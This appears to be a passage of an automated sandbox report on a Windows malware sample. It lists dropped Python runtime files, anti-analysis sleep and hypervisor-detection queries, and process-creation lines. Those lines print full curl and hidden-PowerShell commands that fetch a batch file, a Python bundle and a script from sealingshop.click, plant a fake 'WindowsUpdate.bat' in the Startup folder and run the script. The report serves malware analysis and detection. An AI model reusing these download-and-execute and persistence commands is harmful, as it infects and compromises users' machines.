Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\select.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\win32\perfmondata.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\pywin32_system32\pythoncom39.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_uuid.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_zoneinfo.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\win32\mmapfile.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\win32\servicemanager.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\Public\python39\DLLs\_socket.pyd	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508	Thread sleep count: 5562 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep count: 3847 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7388	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020	Thread sleep count: 3250 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416	Thread sleep count: 392 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976	Thread sleep count: 6624 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976	Thread sleep count: 3112 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Source: C:\Windows\System32\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior

Source: svchost.exe, 00000006.00000002.3304107943.000001978D02B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: powershell.exe, 00000005.00000002.2228602367.0000019E25EF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: svchost.exe, 00000006.00000002.3306912165.000001979265C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: curl.exe, 00000003.00000003.2115672309.000001B2FC494000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.3104456590.0000021E0D3A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000009.00000003.2619921641.0000015DD2C76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "C:\\Users\\Public\\libs.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/py/rose_tien -o "C:\\Users\\Public\\python39\\documents.py"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\python39\python.exe C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "c:\\users\\public\\libs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "c:\\users\\public\\libs.bat"			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
